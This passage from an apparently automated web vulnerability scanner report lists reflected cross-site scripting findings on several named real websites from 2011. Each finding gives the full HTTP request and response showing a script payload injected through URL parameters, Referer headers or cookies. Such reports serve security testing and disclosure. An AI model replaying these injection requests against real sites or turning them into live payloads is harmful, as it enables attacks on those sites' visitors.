This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:aa98d"><script>alert(1)</script>1801b841c81/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1
Host: www.stylemepretty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 14:16:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Vary: Cookie,Accept-Encoding
X-Pingback: http://www.stylemepretty.com/xmlrpc.php
X-Mobilized-By: WordPress Mobile Pack 1.2.0
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 14:16:04 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:aa98d\"><script>alert(1)</script>1801b841c81/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.stylemepretty.com
Path:	/\|http:/stylehive.com\|http:/stylelist.com\|http:/www.outblush.com/\|http:/www.dooce.com/\|http:/www.mightygoods.com/\|http:/www.coolmompicks.com\|onemanga.com\|psychcentral.com\|webmail.aol.com\|http:/www.weblogsinc.com\|http:/www.webmd.com/$\|wonderwall.msn.com\|msn.com/wonderwall\|v14.msn.com/\|preview.msn.com/\|www.msn.com/preview.aspx\|mtv.com/videos/\|mtv.com/

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51bf8"><script>alert(1)</script>b8600a47817 was submitted in the REST URL parameter 8. This input was echoed as 51bf8\"><script>alert(1)</script>b8600a47817 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com51bf8"><script>alert(1)</script>b8600a47817/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1
Host: www.stylemepretty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 14:16:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Vary: Cookie,Accept-Encoding
X-Pingback: http://www.stylemepretty.com/xmlrpc.php
X-Mobilized-By: WordPress Mobile Pack 1.2.0
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 14:16:10 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com51bf8\"><script>alert(1)</script>b8600a47817/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.stylemepretty.com
Path:	/\|http:/stylehive.com\|http:/stylelist.com\|http:/www.outblush.com/\|http:/www.dooce.com/\|http:/www.mightygoods.com/\|http:/www.coolmompicks.com\|onemanga.com\|psychcentral.com\|webmail.aol.com\|http:/www.weblogsinc.com\|http:/www.webmd.com/$\|wonderwall.msn.com\|msn.com/wonderwall\|v14.msn.com/\|preview.msn.com/\|www.msn.com/preview.aspx\|mtv.com/videos/\|mtv.com/

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a390e"><script>alert(1)</script>49cfc60d79b was submitted in the REST URL parameter 9. This input was echoed as a390e\"><script>alert(1)</script>49cfc60d79b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:a390e"><script>alert(1)</script>49cfc60d79b/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1
Host: www.stylemepretty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 14:16:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Vary: Cookie,Accept-Encoding
X-Pingback: http://www.stylemepretty.com/xmlrpc.php
X-Mobilized-By: WordPress Mobile Pack 1.2.0
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 14:16:15 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:a390e\"><script>alert(1)</script>49cfc60d79b/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/previe
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.stylemepretty.com
Path:	/\|http:/stylehive.com\|http:/stylelist.com\|http:/www.outblush.com/\|http:/www.dooce.com/\|http:/www.mightygoods.com/\|http:/www.coolmompicks.com\|onemanga.com\|psychcentral.com\|webmail.aol.com\|http:/www.weblogsinc.com\|http:/www.webmd.com/$\|wonderwall.msn.com\|msn.com/wonderwall\|v14.msn.com/\|preview.msn.com/\|www.msn.com/preview.aspx\|mtv.com/videos/\|mtv.com/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa140"><script>alert(1)</script>b13730ce227 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as aa140\"><script>alert(1)</script>b13730ce227 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/?aa140"><script>alert(1)</script>b13730ce227=1 HTTP/1.1
Host: www.stylemepretty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 14:15:25 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Vary: Cookie,Accept-Encoding
X-Pingback: http://www.stylemepretty.com/xmlrpc.php
X-Mobilized-By: WordPress Mobile Pack 1.2.0
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 14:15:25 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://
...[SNIP]...
om|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/?aa140\"><script>alert(1)</script>b13730ce227=1" />
...[SNIP]...

1.318. http://hs.maas360.com/main-site-theme/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://hs.maas360.com
Path:	/main-site-theme/

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload f5dba--><script>alert(1)</script>cebbc660511 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /main-site-theme/ HTTP/1.1
Host: hs.maas360.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=f5dba--><script>alert(1)</script>cebbc660511

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:00:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: fltrk_ref=http%3A%2F%2Fwww.google.com%2Fsearch%3Fhl%3Den%26q%3Df5dba--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ecebbc660511; expires=Tue, 04-Oct-2011 14:00:48 GMT; path=/; domain=.maas360.com
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 72397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<script>alert(1)</script>cebbc660511"
[4]=>
...[SNIP]...

1.319. http://users.techtarget.com/registration/searchsecurity/LoginRegister.page [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://users.techtarget.com
Path:	/registration/searchsecurity/LoginRegister.page

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6c1e"><script>alert(1)</script>dbef456b112 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /registration/searchsecurity/LoginRegister.page HTTP/1.1
Host: users.techtarget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=f6c1e"><script>alert(1)</script>dbef456b112

Response

HTTP/1.1 200 OK
Server: Resin/3.1.8
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 10138
Connection: close
Date: Sun, 04 Sep 2011 14:04:48 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--
_____ _ _____ < Registration > _
[_ _]___ ___| |___ [
...[SNIP]...
<input type="hidden" name="fromURL" value="http://www.google.com/search?hl=en&q=f6c1e"><script>alert(1)</script>dbef456b112" id="Login_fromURL"/>
...[SNIP]...

1.320. http://users.techtarget.com/registration/searchsecurity/Register.page [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://users.techtarget.com
Path:	/registration/searchsecurity/Register.page

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64f72"><script>alert(1)</script>5bb45aed47 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /registration/searchsecurity/Register.page HTTP/1.1
Host: users.techtarget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=64f72"><script>alert(1)</script>5bb45aed47

Response

HTTP/1.1 200 OK
Server: Resin/3.1.8
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Date: Sun, 04 Sep 2011 14:04:50 GMT
Content-Length: 49022

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--
_____ _ _____ < Registration > _
[_ _]___ ___| |___ [
...[SNIP]...
<a href="http://users.techtarget.com/registration/searchsecurity/LoginRegister?fromURL=http://www.google.com/search?hl=en&q=64f72"><script>alert(1)</script>5bb45aed47" class="logIn">
...[SNIP]...

1.321. http://www.cwsubscribe.com/favicon.ico [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.cwsubscribe.com
Path:	/favicon.ico

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2551b"><script>alert(1)</script>e3d125ce72e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /favicon.ico HTTP/1.1
Host: www.cwsubscribe.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=2551b"><script>alert(1)</script>e3d125ce72e

Response

HTTP/1.0 404 Not Found
Date: Sun, 04 Sep 2011 14:55:03 GMT
Server: WebSitePro/2.5.8
Accept-ranges: bytes
Content-type: text/html
Content-length: 414

<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD>
<BODY bgcolor="White"><H2>404 Not Found</H2>
The requested URL was not found on this server:<P><CODE>/favicon.ico<P>(E:\WebSite\computerworld\favicon.ic
...[SNIP]...
<A HREF="http://www.google.com/search?hl=en&q=2551b"><script>alert(1)</script>e3d125ce72e">
...[SNIP]...

1.322. http://www.networkworld.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.networkworld.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d799'-alert(1)-'1a51c983f55 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=5d799'-alert(1)-'1a51c983f55

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Cneonction: close
Content-Type: text/html; charset=UTF-8
Expires: Sun, 04 Sep 2011 14:11:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 14:11:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 223493

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
,
           rxsubtopicname: '',
           pgtype: 'homepage',
           subtopic: '',
           freemium: 'n',
           nsdr_auth: 'no',
subtopicid: 0,
outerref: 'http://www.google.com/search?hl=en&q=5d799'-alert(1)-'1a51c983f55',
nwchannel: 'Network World',
request_uri: '/',
doc_uri: '/index.html',
site: 'home',
rxid: '75931',
nodeid: ''

...[SNIP]...

1.323. http://seg.sharethis.com/getSegment.php [__stid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://seg.sharethis.com
Path:	/getSegment.php

Issue detail

The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload 98074<script>alert(1)</script>8dd098d2f59 was submitted in the __stid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /getSegment.php?purl=http%3A%2F%2Fwww.spamfighter.com%2FNews-16694-Skype-Vulnerability-Makes-End-Users-Susceptible-to-Malware-Execution.htm&jsref=http%3A%2F%2Fwww.google.com%2F%23sclient%3Dpsy%26hl%3Den%26tbm%3Dnws%26source%3Dhp%26q%3D%2522xss.cx%2522%26pbx%3D1%26oq%3D%2522xss.cx%2522%26aq%3Df%26aqi%3D%26aql%3D%26gs_sm%3De%26gs_upl%3D4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0%26fp%3D1%26biw%3D1407%26bih%3D931%26bav%3Don.2%2Cor.r_gc.r_pw.%26cad%3Db&rnd=1315138414557 HTTP/1.1
Host: seg.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.spamfighter.com/News-16694-Skype-Vulnerability-Makes-End-Users-Susceptible-to-Malware-Execution.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CqCKBE5ezzUzVT7FCnHuAg==98074<script>alert(1)</script>8dd098d2f59

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Sun, 04 Sep 2011 12:13:00 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 1376

           <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
           <html>
           <head>
           <meta http-equiv="Content-type" content="text/html;charset=UTF-8">

...[SNIP]...
<div style='display:none'>clicookie:CqCKBE5ezzUzVT7FCnHuAg==98074<script>alert(1)</script>8dd098d2f59
userid:
</div>
...[SNIP]...

1.324. http://www.whatisnetwork.com/go/http:/buzz.yahoo.com/buzz [REST URL parameter 3] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.whatisnetwork.com
Path:	/go/http:/buzz.yahoo.com/buzz

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be0a4"><script>alert(1)</script>6fb73ea2cbe was submitted in the REST URL parameter 3. This input was echoed as be0a4\"><script>alert(1)</script>6fb73ea2cbe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /go/http:/buzz.yahoo.combe0a4"><script>alert(1)</script>6fb73ea2cbe/buzz HTTP/1.1
Host: www.whatisnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 14:16:36 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.whatisnetwork.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 04 Sep 2011 14:16:36 GMT
Location: http://buzz.yahoo.combe0a4\"><script>alert(1)</script>6fb73ea2cbe/buzz
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset="utf-8"
Content-Length: 803

<html><head><title>Redirecting...</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="robots" content="noindex,nofollow" />
<meta http-equiv="refresh" content="3; url=http://buzz.yahoo.combe0a4\"><script>alert(1)</script>6fb73ea2cbe/buzz" />
...[SNIP]...

1.325. http://www.whatisnetwork.com/go/http:/buzz.yahoo.com/buzz [REST URL parameter 4] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.whatisnetwork.com
Path:	/go/http:/buzz.yahoo.com/buzz

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7041"><script>alert(1)</script>8025b887fd1 was submitted in the REST URL parameter 4. This input was echoed as a7041\"><script>alert(1)</script>8025b887fd1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /go/http:/buzz.yahoo.com/buzza7041"><script>alert(1)</script>8025b887fd1 HTTP/1.1
Host: www.whatisnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 14:16:37 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.whatisnetwork.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 04 Sep 2011 14:16:38 GMT
Location: http://buzz.yahoo.com/buzza7041\"><script>alert(1)</script>8025b887fd1
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset="utf-8"
Content-Length: 803

<html><head><title>Redirecting...</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="robots" content="noindex,nofollow" />
<meta http-equiv="refresh" content="3; url=http://buzz.yahoo.com/buzza7041\"><script>alert(1)</script>8025b887fd1" />
...[SNIP]...

1.326. http://www.whatisnetwork.com/go/http:/buzz.yahoo.com/buzz [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.whatisnetwork.com
Path:	/go/http:/buzz.yahoo.com/buzz

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9936"><script>alert(1)</script>e79c1663726 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a9936\"><script>alert(1)</script>e79c1663726 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /go/http:/buzz.yahoo.com/buzz?a9936"><script>alert(1)</script>e79c1663726=1 HTTP/1.1
Host: www.whatisnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 14:16:21 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.whatisnetwork.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 04 Sep 2011 14:16:22 GMT
Location: http://buzz.yahoo.com/buzz?a9936\"><script>alert(1)</script>e79c1663726=1
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset="utf-8"
Content-Length: 838

<html><head><title>Redirecting...</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="robots" content="noindex,nofollow" />
<meta http-equiv="refresh" content="3; url=http://buzz.yahoo.com/buzz?a9936\"><script>alert(1)</script>e79c1663726=1" />
...[SNIP]...

1.327. http://www.whatisnetwork.com/go/http:/delicious.com/save [REST URL parameter 3] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.whatisnetwork.com
Path:	/go/http:/delicious.com/save

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e29d"><script>alert(1)</script>59e5c7282c5 was submitted in the REST URL parameter 3. This input was echoed as 4e29d\"><script>alert(1)</script>59e5c7282c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /go/http:/delicious.com4e29d"><script>alert(1)</script>59e5c7282c5/save HTTP/1.1
Host: www.whatisnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 14:16:32 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.whatisnetwork.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 04 Sep 2011 14:16:33 GMT
